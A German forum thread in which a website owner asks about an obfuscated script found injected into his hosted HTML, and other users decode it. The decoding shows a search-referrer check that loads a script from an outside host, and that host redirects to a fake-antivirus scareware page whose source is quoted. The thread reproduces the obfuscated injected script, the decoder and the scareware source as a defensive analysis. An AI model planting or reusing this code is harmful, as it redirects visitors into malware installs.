nicht angemeldet
VIRUS oder Sonst was im HTML CODE
Hey Leute.
Ich hab heute mal wieder an meiner Seite weiter gebaut und musste plötzlich feststellen das da was war was ich nicht rein gemacht hatte.
Kann mir wer sagen was das ist oder der gleichen? Woher es kommt und so...
"
<script>C=0;C<iN.length;C+=4){G=(k.indexOf(iN.charAt(C))&255)<<18|(k.indexOf(iN.charAt(C+1))&255)<<12|(k.indexOf(iN.charAt(C+2))&255)<<(6)|k.indexOf(iN.charAt(C+3))&255;HL+=String.fromCharCode((G&16711680)>>16,(G&65280)>>8,G&255);}eval(HL.substring(0,HL.length-(2)));}r('tv(TIzQYAxy/f#SYEqM]2r1Ytq/S:8kR:ZNvJ4hMus6LjS{r\_I\_iZt1r#1kX0Yq(N7#6{hY#|{i(5UOf+SZ6zi0#{k.:4J.IsY(O0{ECrt0?+1]\*xIsiX6Fu#JR)rtSJqhuOztSJqh##sNv-s14Az\*]64{\_\*Ff7iZ1Fu5k:C4MkA46N:Z1F2sNN2r1uu#S]C4kTt5(yjxI]:(]TIxSSJ|{N2FfY2#I\_?jXYuZwMO+w]:8UYA4QkF7425k:C4?]Ir-h68SF2sFY2#I_?jXYuZwMivw]:8UYA4QkF7425k:C4?]Ir-h68SF2s\*Y2#I\_?jXYuZw]?qka:8UYA4QkF7425k:C4?]Ir-h68SF2siY2#I_?jXRX|.lu(?NJ4kTt_U4J471fxSSJ|?^t5X]2Fa4ijIzijFxOZ;Yu[yM?qw]j_Ix?j*yi8|%u[/.j_I_?jXYOz0k64{.2{-CCv?0Iv?NJ4kTt_/wC{-CC4MkA46N:8N]iq|Y2j17f#/v20?O#ZtLj5]l#5?X(+1NuE-Ei(|_#{|sfrS]CF{U?zt2I4(M20?QIFwz6[Qk`xXxEv6;?FYEO0{i`+?X(ZQL(j*z20|l(x(LrrIzCXMZ?4hXfxM)20-.CXwyC8N4O{;sQE*x?FYy`q?i?({X2sSf?[hx2xJ_JNMtj+kk*x0sfEM2I|M{#v(kIFwyC8N4O{;sQE*x?FYy`q?i?({X2sSf?[hx2xJ_JNMtj+kk*x0sfEM2I|wzi{?Q`k?j*z{X(4is#k-ztkfN6j7h`x?Xfr(Li0-*INh2(kFz-[6LI4(:Qx;w`zf1Ek-.Ox(q6(-1?Fwsi{t;?{QE`[7i?ES;({-fC{-zIZQ:E[Iz-kI[X4|ytr6XE4M#-|70O81z`4-1`NXLXv6tC#tri8?kE|6:A(6Ofx-EQx(2`rt(2sX[X|MU`4h)X4h0Q(-tX(hRI0-164-Q(+6r6kf1i{ki#8M;2z1fO|(#JsQ2`q?_j+6xCE(MCZYr?FhxXZSztk6EJx?k6[Ix(sQ.f{Y#A80kEq1s(ZawA5*1JzY66j;[jzFxEqIyX+JlfzJs#k6iE(?:`[{h`|h/i[6kuNYZ6+Il?X6q:j/lAFYq6E(:XkkZ?vSsJjIzr0(rJXJ&(+(]i_1Z?NJlCjt(X[(;u0YuIFSjj_iMiv1k?[tZI0a_JNMgXz|[X40x6zI_?xX&#v?iI{?q6q0k`|hzIvIlCjhjXj6NIvYq(ZQL((7#I+Fl(sIz-vt0JEX&i{F_?x(;206kiNa&`4t1#FXL?v6.fZh#EEtu`v(1j+6/j+f&J0awXkkx-[Q]C5(ECZ]wC(|1i{?Q?zQq`4-X6XUQ(F?.([-ZX{ki?zI1tj6_Ovf&EEJljx;&f(Iwf{Q#iF?{Iv(#Ek6iO0J1Q0Y:Ek6/(s7[Ajhr20(iJr6s:j6zXEyyI+flX0Fz2sQ]?5(RtEhr`xhMEk6iO_1yJ0Yju0;sE|SrtXY*Os?:6NMMXs7f?k6Rtr*x`Eh0?vSs-q1EJ_Mj6sh.(ZQx*NMyf#M)Cr6(#|7/*xky(0QX6|{.#v/wi0-:Q_tY`[h;(ZS_C{J&`4h2(qix?vkkCFMzIq0:`Fhx(_0f#8txir(j`|h;Xx-/C#1Z6j7h#5wMj5-kj_ts?xtNJz6*-k].jqJYO_;/');</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>...</title>
..."
schonmal danke für antworten
Robert
-
Mahlzeit Neutron,
Ich hab heute mal wieder an meiner Seite weiter gebaut und musste plötzlich feststellen das da was war was ich nicht rein gemacht hatte.
Wo war das? Bei Dir lokal? Oder auf Deinem Webserver? Was für eine Art Webserver ist das? Ein "freier Hoster", der sich durch Werbeeinblendungen (üblicherweise durch Javascript) finanziert? Oder zahlst Du dafür?
Kann mir wer sagen was das ist oder der gleichen? Woher es kommt und so...
Der, der's reingetan hat, kann das am Besten (s.o.). Es handelt sich um ein Skript - vermutlich Javascript.
MfG,
EKKi--
sh:( fo:| ch:? rl:( br:> n4:~ ie:% mo:} va:) de:] zu:) fl:{ ss:) ls:& js:| -
Ich hab heute mal wieder an meiner Seite weiter gebaut und musste plötzlich feststellen das da was war was ich nicht rein gemacht hatte.
Kann mir wer sagen was das ist oder der gleichen? Woher es kommt und so...
sicherheitslücke, sql-injection, fehler im fileuploar, der templatenegine oder ähnliches
-
Hi,
Ich hab heute mal wieder an meiner Seite weiter gebaut und musste plötzlich feststellen das da was war was ich nicht rein gemacht hatte.
das ist der Sid-Virus. Wenn Du nicht aufpasst, frisst er sämtliche Cookies von Deiner Festplatte.
Kann mir wer sagen was das ist oder der gleichen?
Zunächst einmal ist es unvollständig, vermute ich. Zumindest müsste dieser Code Fehler produzieren.
Woher es kommt und so...
Die Frage lautet auch: Siehst nur Du diesen Code oder auch andere?
Cheatah
--
X-Self-Code: sh:( fo:} ch:~ rl:| br:> n4:& ie:% mo:) va:) de:] zu:) fl:{ ss:) ls:~ js:|
X-Self-Code-Url: http://emmanuel.dammerer.at/selfcode.html
X-Will-Answer-Email: No
X-Please-Search-Archive-First: Absolutely Yes -
Grüße,
gleich erster Treffer sieht passend aus:
http://support.phpfusion-de.com/forum/viewthread.php?forum_id=55&thread_id=18186&pid=120265
MFG
bleicher--
__________________________-
Die Essenz der Egomanie
ie:{ fl:( br:< va:| ls:[ fo:# rl:? n4:? ss:| de:> js:| ch:| sh:( mo:| zu:| -
Also es ist ein Hoster für den ich bezahl bei 1und1
und es ist nur auf dem Server...Aber es passiert irgendwie nichts zumindest nichts sichtbares.
-
hallo,
Aber es passiert irgendwie nichts zumindest nichts sichtbares.
Kann auch nicht, weil das was auf/in deiner Seite gelandet ist (wie bereits erwähnt) nicht vollständig ist. Woher es kommt kann ich dir nicht sagen, was es macht schon.
es handelt sich um eine dreimal in sich selbst "verschleierte"/"codierte" (?) Funktion, die sich erst selbst "entschleiert"/"dekodiert" (?) und dann einen (ich vermute mal) Banner in deine seite schreiben will.der code:
//ursprüngliche funktion function r(iN,k) { if (!k) { k=';h8ZF{5+*-2Ci?OufQ#jX(ErIt:AJ6`)/Sq[|k4v]Ygl.1T^wM_sN0xzyULRa7%&'; } var G; var HL=''; for (var C=0;C<iN.length;C+=4) { G=(k.indexOf(iN.charAt(C))&255)<<18|(k.indexOf(iN.charAt(C+1))&255)<<12|(k.indexOf(iN.charAt(C+2))&255)<<(6)|k.indexOf(iN.charAt(C+3))&255; HL+=String.fromCharCode((G&16711680)>>16,(G&65280)>>8,G&255); } alert(HL.substring(0,HL.length-(2)));} //eigentlich eval(...) r('tv(TIzQYAxy/f#SYEqM]2r1Yt'+/*vielezeichen*/+'8txir(j`|h;Xx-/C#1Z6j7h#5wMj5-kj_ts?xtNJz6*-k].jqJYO_;/'); //erstes dekodieren function A(iZ,h) { if (!h) { h= 'r`q?7zy8E_&206m]+eSZbWORtPiJALTnN@xCws5HYljg,c:U;QV-vu4{h#f31GD='; } var O; var RK=''; for (var D=0;D<iZ.length;D+=4) { O=(h.indexOf(iZ.charAt(D))&255)<<18|(h.indexOf(iZ.charAt(D+1))&255)<<12|(h.indexOf(iZ.charAt(D+2))&255)<<(6)|h.indexOf(iZ.charAt(D+3))&255;RK+=String.fromCharCode((O&16711680)>>16,(O&65280)>>8,O&255); } alert(RK.substring(0,RK.length-(2))); //eigentlich eval(...) } A('+SNH6zLj+HcTT{t=bV1Y2HY3'+/*vielezeichen*/+'&v1uSz@@Sb`-+Cu?AHl1LbeO&s7ftswH&Z,N'); //zweites dekodieren A('4WjB{^{v?S/(.z;r.,pa4mDBA,'+/*vielezeichen*/+'@sB=Crz|uDV*Q:bY') //et voila: was eigentlich passieren soll var r = document.referrer; if (r.indexOf("google") != -1 || r.indexOf("live") != -1 || r.indexOf("yahoo") != -1 || r.indexOf("search") != -1 || r.indexOf("result") != -1 || r.indexOf("cache") != -1 || r.indexOf("translate") != -1) { document.write('<sc'+'ript src="http://personal.count.for.my.banner.here.is.banner-count.com:8080/cgi-bin/banner-counter.pl?id=111117&ref='+escape(document.referrer)+'"></sc'+'ript>') }Was ich mich nur frage: wozu diese Abfrage bevor der Banner geschrieben wird?
gruß,
pD
-
Weil ich gerade noch Zeit hatte:
Vom Server kommt kein Banner, sondern ein Code-Schnippsel der nach dem gleichen Muster "verschleiert"/"kodiert" ist:
function U(sx,Z){ if(!Z){Z='tV(&ue%Y[7A=-iP<R?zH#b|.$/W5{Sp!JGa_;F3+*jD`EXxMCI9ym,)lgr:dZcBf';}var g;var XF='';for(var Y=0;Y<sx.length;Y+=4){g=(Z.indexOf(sx.charAt(Y))&255)<<18|(Z.indexOf(sx.charAt(Y+1))&255)<<12|(Z.indexOf(sx.charAt(Y+2))&255)<<(6)|Z.indexOf(sx.charAt(Y+3))&255;XF+=String.fromCharCode((g&16711680)>>16,(g&65280)>>8,g&255);}alert(XF);}U('/%c_S|,F5+RxSl7jS%#*7yIy$9{`7l7j{YRB[%?M$lbX/|rm=3IM$)emW|cx<z7*SY?CPaZM/)ZX{)iG5a,C{3Zx$)cX=yc,W|Rc-H$r[atZ=li_79E+{3FCS&g+AHEJ'); //die "entschleiert" folgendes hervorbringt document.write('<sc'+'ript> document.location="http://go-scan-pro.com/?uid=169" </sc'+'ript>');Eine ganz schön komplizierte Art einer Umleitung. Schließlich landet man auf einer Seite, ab der es mir dann (mit meinem eingeschränkten Sachverstand) zu heiß wird weiter zu "forschen".
Für interessierte der Quelltext:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Internet Security is important </title> <script type="text/javascript"> var confmsg='Attention! Your PC may not have privacy protection system. This may lead to irretrievable results.\n\nNow your system will be scanned for privacy security risks.\n\nPress OK to continue.'; var alrtmsg='Internet Antivirus will scan your system now.\n\nPlease select "RUN" or "OPEN" when prompted to start the installation.\n\nThis file has been digitally signed and independently certified as 100% free of viruses, adware and spyware.'; </script> <script language="javascript" src="script_de.js"></script> <script type="text/javascript"> function start_actions() { window.location='/22/?uid=keyin&in=0&xx=0&end=0&g=1&';} </script> </head> <body onload="start_actions()"> <script> document.write('<OBJECT id="iie" width="0" height="0" style="position:absolute; left:0;top:0;" CLASSID="CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6" type="application/x-oleobject"> <PARAM NAME="SendPlayStateChangeEvents" VALUE="True"> <PARAM NAME="AutoStart" VALUE="True"> <PARAM name="uiMode" value="none"> <PARAM name="PlayCount" value="9999"></OBJECT>'); </script> </body> </html>gruß,
pD
-
Hi,
<title>Internet Security is important </title>
<script type="text/javascript">
var confmsg='Attention! Your PC may not have privacy protection system. This may lead to irretrievable results.\n\nNow your system will be scanned for privacy security risks.\n\nPress OK to continue.';
var alrtmsg='Internet Antivirus will scan your system now.\n\nPlease select "RUN" or "OPEN" when prompted to start the installation.\n\nThis file has been digitally signed and independently certified as 100% free of viruses, adware and spyware.';Das ist (via Website-Hack) untergeschobene Werbung für sog. Scareware. Hier wird eine Webseite aufgerufen, die dem Anwender wahrscheinlich vorgaukelt, der Rechner würde von einem Online-Virenscanner überprüft (wahlweise auch sonst eine Scannsoftware, die angeblich das System auf böse Software/Lücken überprüft). Natürlich wird bei dieser "Überprüfung" (die natürlich nicht stattfindet, und auch nicht stattfinden kann - das wäre nur über die gezielte Nutzung eines Exploits, sehr alten IEs, schlechter IE-Konfiguration oder nach manueller Bestätigung durch den Surfer möglich) immer etwas "gefunden". Der Surfer soll dann wahlweise entweder eine Software gegen Geld erwerben, die das "Problem" beheben kann, oder er wird aufgefordert, doch gleiche eine (ggf. kostenlose) Software herunterzuladen, die das "Problem" behebt.
Im ersten Fall hat der Käufer bestenfalls Geld für eine (i.d.R.) nutzlose Software ausgegeben, im letzteren Fall hat er sich mit dem Start dieses Programms einfach einen Virus/Trojaner/... auf seinen Rechner installiert. Hier sieht es so aus, als wenn der Surfer gleich Maleware auf seinem Rechner installieren soll ('Please select "RUN" or "OPEN" when prompted to start the installation.').
Scareware ist mom. ein ziemlich großes Problem/Ärgernis (s. auch z.B. Heise: Microsoft verklagt Anbieter von falscher Anti-Spyware).
Die Abfrage auf "google" & Co. dient dazu, daß man (z.B. der Sitebetreiber) diesen Angriff nicht sieht, wenn normal auf der infizierten Website herumgesurft wird. Gefangen werden sollen damit "nur" die Surfer, die die infizierte Seite direkt von einer Suchmaschine ansurfen ...
... was der Sitebetreiber ja i.d.R. selbst nicht macht.
Gruß, Cybaer
--
Man muß viel gelernt haben, um über das, was man nicht weiß, fragen zu können.
(Jean-Jacques Rousseau, Philosoph u. Schriftsteller)
-
-
-
-
Hallo Neutron!
Ich hab heute mal wieder an meiner Seite weiter gebaut und musste plötzlich feststellen das da was war was ich nicht rein gemacht hatte.
Look what they've done to my site, ma...
(...)
I wish I could find a good book to live in
Wish I could find a good book
Well, if I could find a real good book
I'd never have to come out and look at
What they've done to my site, ma...*SCNR*
Viele Grüße aus Frankfurt/Main,
Patrick--
_ - jenseits vom delirium - _
Diblom [link:hatehtehpehdoppelpunktslashslashwehwehwehpunktatomicminuseggspunktcomslash]
Achtung Agentur! | Nichts ist unmöglich? Doch! | Heute schon gegökt?
